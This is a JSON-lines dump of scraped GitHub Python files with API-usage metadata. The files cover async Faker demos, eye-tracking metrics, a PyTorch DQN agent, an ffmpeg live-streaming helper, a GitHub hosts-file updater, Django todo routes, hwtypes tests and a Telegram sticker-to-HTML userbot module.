"line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 45, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 51, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 51, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "38782358148", "text": "import asyncio\nfrom typing import List, Iterable, Awaitable\n\nfrom faker import Faker\n\n\nfrom timing import async_timed\n\nfake = Faker('uk-UA')\n\n\nasync def async_get_user_from_fake_db(uuid: int):\n await asyncio.sleep(0.5)\n return {'id': uuid, 'name': fake.name(), 'email': fake.email()}\n\n\ndef get_users(uuids: List[int]) -> Iterable[Awaitable]:\n return [async_get_user_from_fake_db(uuid) for uuid in uuids]\n\n\n@async_timed()\nasync def main(users: Iterable[Awaitable]):\n return await asyncio.gather(*users)\n\n\nif __name__ == 
'__main__':\n r = asyncio.run(main(get_users([1, 2, 3])))\n print(r)\n", "repo_name": "GoIT-Python-Web/Py10Web", "sub_path": "m10_05_02/01_async_for.py", "file_name": "01_async_for.py", "file_ext": "py", "file_size_in_byte": 604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "faker.Faker", "line_number": 9, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 13, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Awaitable", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Awaitable", "line_number": 22, "usage_type": "name"}, {"api_name": "asyncio.gather", "line_number": 23, "usage_type": "call"}, {"api_name": "timing.async_timed", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "39314921483", "text": "from mongo_connection import Mongo_connection\nimport numpy as np\nimport pandas as pd\nimport pair_transition_analysis\nimport granger_causation_test\nfrom matplotlib import pyplot as plt\nfrom collections import defaultdict\nimport roi_config\nimport fixation\nimport hypothesis_testing\n\n\nmongo = Mongo_connection()\nmongo.connect()\n\ndef get_basic_metrics(df_fixation):\n d = {}\n d[\"fixation_mean_duration\"] = df_fixation[\"duration\"].mean()\n d[\"fixation_rate\"] = len(df_fixation)/df_fixation[\"end\"].values[-1]*1000/60\n d[\"saccade_amplitude\"] = np.sqrt(np.diff(df_fixation[\"x\"])**2 + np.diff(df_fixation[\"y\"])**2).mean()\n d[\"saccade_mean_duration\"] = np.mean(df_fixation[\"start\"].values[1:] - df_fixation[\"end\"].values[:-1])\n \n return d\n\ndef create_transition_matrix(transitions):\n m = pd.crosstab(pd.Series(list(transitions)[1:], name = \"t+1\"),\n pd.Series(list(transitions)[:-1], name = \"t\"),normalize=1)\n \n return m\n\ndef calculate_entropy(transitions):\n if len(transitions) == 0:\n return 0, 0\n# transitions = replace_repeated_character(transitions)\n\n trans_matrix = create_transition_matrix(transitions)\n m = {}\n for c in trans_matrix.columns:\n m[c] = trans_matrix[c].tolist()\n\n Hs = 0\n Ht = 0\n pA = {c:len(np.where(np.array(list(transitions))==c)[0])/len(transitions) for c in list(set(transitions))}\n\n for k,v in pA.items():\n Hs += -1 * np.nan_to_num(v*np.log2(v))\n Ht += -sum(pA[k]*(np.nan_to_num(m[k]*np.log2(m[k]))))\n \n return Hs, Ht\n\ndef get_advanced_metrics(df_fixation):\n d = {}\n transitions, L = pair_transition_analysis.encode_transition(df_fixation[\"roi\"])\n Hs, Ht = calculate_entropy(transitions)\n d[\"Hs\"] = Hs\n d[\"Ht\"] = Ht\n \n return d\n\n\ndef get_dwell_stat(df_data):\n agg_sum = df_data.groupby([\"roi\"]).agg({'duration': 'sum'})\n agg_sum_percent = agg_sum/sum(agg_sum['duration'])\n agg_mean = df_data.groupby([\"roi\"]).agg({'duration': 'mean'})\n agg_var = df_data.groupby([\"roi\"]).agg({'duration': 'var'})\n agg_fixrate = df_data.groupby([\"roi\"]).agg({'duration': 'count'})/df_data.iloc[-1][\"end\"]*1000/60\n \n list_roi = list(set(df_data[\"roi\"]))\n d = {}\n for roi in list_roi:\n d[\"duration_{}\".format(roi)] = agg_sum.loc[roi][0]\n d[\"duration_percentage_{}\".format(roi)] = agg_sum_percent.loc[roi][0]\n d[\"duration_average_{}\".format(roi)] = agg_mean.loc[roi][0]\n d[\"duration_var_{}\".format(roi)] = 
agg_var.loc[roi][0]\n d[\"fix_rate_{}\".format(roi)] = agg_fixrate.loc[roi][0]\n \n# df_data = fixation.merge_consecutive_fixations_in_same_roi(df_data)\n \n# df_runway = df_data[df_data[\"roi\"]==\"runway\"]\n# duration_in_between_runway = df_runway[\"start\"].values[1:] - df_runway[\"end\"].values[:-1]\n# n_transition_in_between_runway = np.diff(df_runway.index) - 1\n# d[\"between_runway_mean_duration_all\"] = np.mean(duration_in_between_runway/n_transition_in_between_runway)\n \n# n_trans = list(set(n_transition_in_between_runway))\n# for n in range(1,4):\n# d[\"between_runway_n_trans_{}\".format(n)] = sum(n_transition_in_between_runway==n)\n# d[\"between_runway_mean_duration_{}\".format(n)] = np.mean(duration_in_between_runway[np.where(n_transition_in_between_runway == n)])\n\n return d\n\ndef run_dwell_stats(cmd):\n documents = mongo.find(cmd)\n d = defaultdict(list)\n for document in documents:\n print(\"trial: {}, group: {}, pID: {}\".format(document[\"trial\"], document[\"group\"], document[\"pID\"]))\n if document[\"trial\"] == 4:\n continue\n \n d['pID'].append(document[\"pID\"])\n d['group'].append(document[\"group\"])\n d['trial'].append(document[\"trial\"])\n d['rating'].append(document[\"rating\"])\n \n \n d[\"null_percent\"].append(document[\"null_percent\"])\n # d[\"calibration\"].append(document[\"calibration\"])\n d_data = document[\"data\"]\n df_data = pd.DataFrame(d_data)\n \n d_dwell = get_dwell_stat(df_data)\n for k in roi_config.encode_table.keys():\n d[\"duration_{}\".format(k)].append(d_dwell.get(\"duration_{}\".format(k), 0))\n d[\"duration_percentage_{}\".format(k)].append(d_dwell.get(\"duration_percentage_{}\".format(k), 0))\n d[\"duration_average_{}\".format(k)].append(d_dwell.get(\"duration_average_{}\".format(k), 0))\n d[\"fix_rate_{}\".format(k)].append(d_dwell.get(\"fix_rate_{}\".format(k), 0))\n \n # for k in d_dwell.keys():\n # if \"between_runway\" in str(k):\n # d[k].append(d_dwell.get(k, 0))\n df_dwell = pd.DataFrame(d).sort_values([\"pID\",\"trial\", \"group\",\"rating\"]).dropna().reset_index().drop(columns=[\"index\"])\n return df_dwell\n\ndef run_basic_metrics(cmd):\n documents = mongo.find(cmd)\n d = defaultdict(list)\n for document in documents:\n print(\"trial: {}, group: {}, pID: {}\".format(document[\"trial\"], document[\"group\"], document[\"pID\"]))\n if document[\"trial\"] == 4:\n continue\n\n d['pID'].append(document[\"pID\"])\n d['group'].append(document[\"group\"])\n d['trial'].append(document[\"trial\"])\n \n d[\"null_percent\"].append(document[\"null_percent\"])\n # d[\"calibration\"].append(document[\"calibration\"])\n d_data = document[\"data\"]\n df_data = pd.DataFrame(d_data)\n transitions, L = pair_transition_analysis.encode_transition(df_data[\"roi\"])\n \n basic_metrics = get_basic_metrics(df_data)\n advance_metrics = get_advanced_metrics(df_data)\n \n d[\"fixation_mean_duration\"].append(basic_metrics[\"fixation_mean_duration\"])\n d[\"fixation_rate\"].append(basic_metrics[\"fixation_rate\"])\n d[\"saccade_amplitude\"].append(basic_metrics[\"saccade_amplitude\"])\n d[\"saccade_mean_duration\"].append(basic_metrics[\"saccade_mean_duration\"])\n \n # d[\"Hs\"].append(advance_metrics[\"Hs\"])\n # d[\"Ht\"].append(advance_metrics[\"Ht\"])\n\n # for ngram_length in range(3,7):\n # subseqcount = defaultdict(dict)\n\n # for i in range(len(transitions)-ngram_length + 1):\n # substring = transitions[i:i+ngram_length]\n # if subseqcount[substring].get(\"count\"):\n # subseqcount[substring][\"count\"] += 1\n # 
subseqcount[substring][\"duration\"] += df_data.iloc[i:i+ngram_length][\"duration\"].sum()\n # else:\n # subseqcount[substring][\"count\"] = 1\n # subseqcount[substring][\"duration\"] = df_data.iloc[i:i+ngram_length][\"duration\"].sum()\n\n # sorted_subseqcount = {k: v for k, v in sorted(subseqcount.items(), key=lambda item: item[1][\"count\"], reverse=True)}\n # more_than_2_time_seq = {k: v for k, v in subseqcount.items() if v[\"count\"] >= 2}\n # count_of_most_seq = 0\n # N_unique_seq = 0\n # print(sorted_subseqcount)\n # if len(subseqcount.values())>0:\n # count_of_most_seq = max(subseqcount.values())/sum(subseqcount.values())\n # N_unique_seq = len(subseqcount.keys())\n \n # N_unique_seq_more_than_2_times = 0\n # if len(more_than_2_time_seq.values())>0:\n # N_unique_seq_more_than_2_times = len(more_than_2_time_seq.keys())\n \n # d[\"N_unique_seq_{}\".format(ngram_length)].append(N_unique_seq)\n # d[\"count_of_most_seq_{}\".format(ngram_length)].append(count_of_most_seq)\n # d[\"N_unique_seq_more_than_2_times_{}\".format(ngram_length)].append(N_unique_seq_more_than_2_times)\n # d[\"mean_repetition_{}\".format(ngram_length)].append(np.mean(list(more_than_2_time_seq.values())))\n\n\n df_res = pd.DataFrame(d).sort_values([\"pID\",\"trial\", \"group\",\"rating\"]).dropna().reset_index().drop(columns=[\"index\"])\n return df_res\n \n", "repo_name": "habom2310/eye-tracking-in-aviation", "sub_path": "bulk_run.py", "file_name": "bulk_run.py", "file_ext": "py", "file_size_in_byte": 7933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mongo_connection.Mongo_connection", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 47, "usage_type": "call"}, {"api_name": "pair_transition_analysis.encode_transition", "line_number": 53, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "roi_config.encode_table.keys", "line_number": 111, "usage_type": "call"}, {"api_name": "roi_config.encode_table", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 120, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 138, "usage_type": "call"}, {"api_name": "pair_transition_analysis.encode_transition", "line_number": 139, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "9741319724", "text": "import torch\nimport torch.nn.functional as Funcional\nimport torch.optim as optim\nfrom 
torch.autograd import Variable\nfrom Memory import Memory\nfrom Network import Network\nimport os\n\nclass Ai():\n \n def __init__(self, inputSize, nbAction, gamma):\n self.gamma = gamma\n self.rewardWindow = []\n self.model = Network(inputSize, nbAction)\n self.memory = Memory(1000)\n self.optimizer = optim.Adam(self.model.parameters(), lr = 0.001)\n self.lastState = torch.Tensor(inputSize).unsqueeze(0)\n self.lastAction = 0\n self.lastReward = 0\n \n def _selectAction(self, state):\n probs = Funcional.softmax(self.model(Variable(state))*100) \n action = probs.multinomial(1)\n return action.data[0,0]\n \n def _learn(self, batchState, batchNextState, batchReward, batchAction):\n outputs = self.model(batchState).gather(1, batchAction.unsqueeze(1)).squeeze(1)\n nextOutputs = self.model(batchNextState).detach().max(1)[0]\n target = self.gamma * nextOutputs + batchReward\n tdLoss = Funcional.smooth_l1_loss(outputs, target)\n self.optimizer.zero_grad()\n tdLoss.backward()\n self.optimizer.step()\n \n def update(self, reward, newSignal):\n newState = torch.Tensor(newSignal).float().unsqueeze(0)\n self.memory.update((self.lastState, newState, torch.LongTensor([int(self.lastAction)]), torch.Tensor([self.lastReward])))\n action = self._selectAction(newState)\n if len(self.memory.memory) > 100:\n batchState, batchNextState, batchAction, batchReward = self.memory.sample(100)\n self._learn(batchState, batchNextState, batchReward, batchAction)\n self.lastAction = action\n self.lastState = newState\n self.lastReward = reward\n self.rewardWindow.append(reward)\n if len(self.rewardWindow) > 1000:\n del self.rewardWindow[0]\n\n return action\n \n def score(self):\n return sum(self.rewardWindow)/(len(self.rewardWindow)+1.)\n\n def save(self):\n torch.save({'state': self.model.state_dict(), 'opti' : self.optimizer.state_dict()}, 'save.pth')\n \n def load(self):\n if os.path.isfile('save.pth'):\n checkpoint = torch.load('save.pth')\n self.model.load_state_dict(checkpoint['state'])\n self.optimizer.load_state_dict(checkpoint['opti'])\n ", "repo_name": "Gabski/simulator", "sub_path": "Ai.py", "file_name": "Ai.py", "file_ext": "py", "file_size_in_byte": 2405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Network.Network", "line_number": 14, "usage_type": "call"}, {"api_name": "Memory.Memory", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.smooth_l1_loss", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 59, 
"usage_type": "call"}]} +{"seq_id": "73229022245", "text": "# -*- coding: utf-8 -*-\n# @Time: 2023/2/5 19:46\n# @FileName: Stream.py\n# @Software: PyCharm\n# @GitHub: KimmyXYC\nimport os\nimport time\nimport subprocess\nfrom loguru import logger\n\n\ndef streaming(live_addr, live_code, config):\n stream_type = config[\"type\"]\n video_path = config[\"video_path\"]\n live_time = config[\"live_time\"]\n if stream_type == 1:\n for root, dirs, files in os.walk(video_path):\n if live_time == 0:\n for file in files:\n logger.info(f\"即将直播: {file}\")\n ffmpeg_run(live_addr, live_code, os.path.join(root, file))\n elif live_time == -1:\n while True:\n for file in files:\n logger.info(f\"即将直播: {file}\")\n ffmpeg_run(live_addr, live_code, os.path.join(root, file))\n else:\n start_time = time.time()\n end_time = start_time + live_time\n while time.time() < end_time:\n for file in files:\n logger.info(f\"即将直播: {file}\")\n ffmpeg_run(live_addr, live_code, os.path.join(root, file))\n if time.time() >= end_time:\n break\n else:\n if live_time != 0 and live_time != -1:\n start_time = time.time()\n end_time = start_time + live_time\n while time.time() < end_time:\n ffmpeg_run(live_addr, live_code, video_path)\n elif live_time == 0:\n ffmpeg_run(live_addr, live_code, video_path)\n else:\n while True:\n ffmpeg_run(live_addr, live_code, video_path)\n\n\ndef ffmpeg_run(live_addr, live_code, video_path):\n cmd = f'ffmpeg -re -i {video_path} -c copy -f flv \"{live_addr}{live_code}\" -flvflags no_duration_filesize'\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n p.wait()\n output, error = p.communicate()\n logger.debug((output.decode()))\n", "repo_name": "KimmyXYC/BiliLive-Auto-Streaming", "sub_path": "App/Stream.py", "file_name": "Stream.py", "file_ext": "py", "file_size_in_byte": 2024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 67, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 17, "usage_type": "call"}, {"api_name": "loguru.logger.info", "line_number": 20, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "loguru.logger.info", "line_number": 25, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 25, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "loguru.logger.info", "line_number": 32, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 51, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 51, "usage_type": "attribute"}, {"api_name": "loguru.logger.debug", "line_number": 54, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "40104635624", "text": "#! 
/Users/jinpeng/miniconda3/bin/python\nimport requests\nimport os\nimport re\n\nurl = 'https://raw.hellogithub.com/hosts'\nresponse = requests.get(url)\n\nif response.status_code == 200:\n hosts_file_path = '/etc/hosts'\n\n with open(hosts_file_path, 'r') as f:\n hosts_file_contents = f.readlines()\n\n start_line = None\n end_line = None\n\n for i, line in enumerate(hosts_file_contents):\n if line.strip() == '# GitHub520 Host Start':\n start_line = i\n elif line.strip() == '# GitHub520 Host End':\n end_line = i\n\n if start_line is not None and end_line is not None:\n delimiter = '\\n'\n new_lines = re.split(f'(?<={delimiter})', response.text)\n hosts_file_contents[start_line:end_line+1] = new_lines\n with open(hosts_file_path, 'w') as f:\n f.writelines(hosts_file_contents)\n print('Content replaced successfully.')\n else:\n print('Could not find start and end markers in the hosts file.')\nelse:\n print(f'Error downloading file. Status code: {response.status_code}')\n\n", "repo_name": "jinpeng/codesnippets", "sub_path": "python/update_github_hosts.py", "file_name": "update_github_hosts.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "re.split", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "18475289911", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='todo'),\n path('archive/', views.archive, name='archive'),\n path('about/', views.about, name='about'),\n path('create/', views.create, name='create'),\n path('<int:pk>/update', views.TodoUpdateView.as_view(), name='todo_update'),\n path('<int:pk>/delete', views.TodoDeleteView.as_view(), name='todo_delete'),\n path('<int:pk>/done', views.done, name='todo_done')\n]", "repo_name": "ek2kk/todolist", "sub_path": "todo/main/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 475, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "38751694751", "text": "import pytest\nimport operator\nimport random\nfrom itertools import product\n\nfrom hwtypes import SIntVector, BitVector, Bit\nfrom hwtypes.bit_vector_abc import InconsistentSizeError\nfrom hwtypes.bit_vector_util import PolyVector, PolyBase\n\ndef _rand_bv(width):\n return BitVector[width](random.randint(0, (1 << width) - 1))\n\ndef _rand_signed(width):\n return SIntVector[width](random.randint(0, (1 << width) - 1))\n\n\ndef _rand_int(width):\n return random.randint(0, (1 << width) - 1)\n\n@pytest.mark.parametrize(\"op\", [\n operator.and_,\n operator.or_,\n operator.xor,\n operator.lshift,\n operator.rshift,\n ])\n@pytest.mark.parametrize(\"width1\", (1, 2))\n@pytest.mark.parametrize(\"width2\", (1, 2))\n@pytest.mark.parametrize(\"use_int\", (False, True))\ndef test_bin(op, width1, width2, use_int):\n x = 
_rand_bv(width1)\n if use_int:\n y = _rand_int(width2)\n res = op(x, y)\n assert type(res) is type(x)\n else:\n y = _rand_bv(width2)\n if width1 != width2:\n assert type(x) is not type(y)\n with pytest.raises(InconsistentSizeError):\n op(x, y)\n else:\n assert type(x) is type(y)\n res = op(x, y)\n assert type(res) is type(x)\n\n\n@pytest.mark.parametrize(\"op\", [\n operator.eq,\n operator.ne,\n operator.lt,\n operator.le,\n operator.gt,\n operator.ge,\n ])\n@pytest.mark.parametrize(\"width1\", (1, 2))\n@pytest.mark.parametrize(\"width2\", (1, 2))\n@pytest.mark.parametrize(\"use_int\", (False, True))\ndef test_comp(op, width1, width2, use_int):\n x = _rand_bv(width1)\n if use_int:\n y = _rand_int(width2)\n res = op(x, y)\n assert type(res) is Bit\n else:\n y = _rand_bv(width2)\n if width1 != width2:\n assert type(x) is not type(y)\n with pytest.raises(InconsistentSizeError):\n op(x, y)\n else:\n assert type(x) is type(y)\n res = op(x, y)\n assert type(res) is Bit\n\n\n@pytest.mark.parametrize(\"t_constructor\", (_rand_bv, _rand_signed, _rand_int))\n@pytest.mark.parametrize(\"t_size\", (1, 2, 4))\n@pytest.mark.parametrize(\"f_constructor\", (_rand_bv, _rand_signed, _rand_int))\n@pytest.mark.parametrize(\"f_size\", (1, 2, 4))\ndef test_ite(t_constructor, t_size, f_constructor, f_size):\n pred = Bit(_rand_int(1))\n t = t_constructor(t_size)\n f = f_constructor(f_size)\n\n t_is_bv_constructor = t_constructor in {_rand_signed, _rand_bv}\n f_is_bv_constructor = f_constructor in {_rand_signed, _rand_bv}\n sizes_equal = t_size == f_size\n\n if (t_constructor is f_constructor and t_is_bv_constructor and sizes_equal):\n # The same bv_constructor\n res = pred.ite(t, f)\n assert type(res) is type(t)\n elif t_is_bv_constructor and f_is_bv_constructor and sizes_equal:\n # Different bv_constuctor\n res = pred.ite(t, f)\n # The bases should be the most specific types that are common\n # to both branches and PolyBase.\n assert isinstance(res, PolyBase)\n assert isinstance(res, BitVector[t_size])\n elif t_is_bv_constructor and f_is_bv_constructor and not sizes_equal:\n # BV with different size\n with pytest.raises(InconsistentSizeError):\n res = pred.ite(t, f)\n else:\n # Trying to coerce an int\n with pytest.raises(TypeError):\n res = pred.ite(t, f)\n", "repo_name": "leonardt/hwtypes", "sub_path": "tests/test_optypes.py", "file_name": "test_optypes.py", "file_ext": "py", "file_size_in_byte": 3730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hwtypes.BitVector", "line_number": 11, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 11, "usage_type": "call"}, {"api_name": "hwtypes.SIntVector", "line_number": 14, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 14, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 18, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 40, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_abc.InconsistentSizeError", "line_number": 40, "usage_type": "argument"}, {"api_name": "pytest.mark.parametrize", "line_number": 20, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "operator.and_", "line_number": 21, "usage_type": "attribute"}, {"api_name": "operator.or_", "line_number": 22, "usage_type": "attribute"}, {"api_name": "operator.xor", "line_number": 23, "usage_type": "attribute"}, {"api_name": "operator.lshift", "line_number": 24, "usage_type": 
"attribute"}, {"api_name": "operator.rshift", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 29, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 29, "usage_type": "attribute"}, {"api_name": "hwtypes.Bit", "line_number": 64, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 69, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_abc.InconsistentSizeError", "line_number": 69, "usage_type": "argument"}, {"api_name": "hwtypes.Bit", "line_number": 74, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 48, "usage_type": "attribute"}, {"api_name": "operator.eq", "line_number": 49, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 50, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 51, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 52, "usage_type": "attribute"}, {"api_name": "operator.gt", "line_number": 53, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 56, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 57, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 58, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 58, "usage_type": "attribute"}, {"api_name": "hwtypes.Bit", "line_number": 82, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_util.PolyBase", "line_number": 99, "usage_type": "argument"}, {"api_name": "hwtypes.BitVector", "line_number": 100, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 103, "usage_type": "call"}, {"api_name": "hwtypes.bit_vector_abc.InconsistentSizeError", "line_number": 103, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 107, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 77, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 79, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 80, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "30129913965", "text": "#by Sh1vam\n#Kangers stay away\n\nimport os\nfrom ub import bot as javes\nimport subprocess, os , asyncio, shutil\nfrom ub.utils import admin_cmd\n\n@javes.on(admin_cmd(\"html\"))\nasync def messup(message):\n await message.edit(\"`making HTML....`\")\n reply = await message.get_reply_message()\n stkr = await reply.download_media(\"tgs.tgs\")\n process = await asyncio.create_subprocess_shell(f\"lottie_convert.py --frame 0 -if 
lottie -of html tgs.tgs shivam.html\",stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n    stdout, stderr = await process.communicate()\n    os.remove(stkr)\n    message_id = None  # avoid a NameError when the command message is not a reply\n    if message.reply_to_msg_id:\n        message_id = message.reply_to_msg_id\n    await message.client.send_file(message.chat_id, \"shivam.html\",force_document=False,reply_to=message_id)\n    os.remove(\"shivam.html\")\n    os.remove(\"tgs.tgs\")\n    await message.delete()\n    \n    \n    \n    \n", "repo_name": "theshashankk/WhiteDevil-WC-", "sub_path": "ub/modules/tgsmarkup.py", "file_name": "tgsmarkup.py", "file_ext": "py", "file_size_in_byte": 866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asyncio.create_subprocess_shell", "line_number": 14, "usage_type": "call"}, {"api_name": "asyncio.subprocess", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 16, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 22, "usage_type": "call"}, {"api_name": "ub.bot.on", "line_number": 9, "usage_type": "call"}, {"api_name": 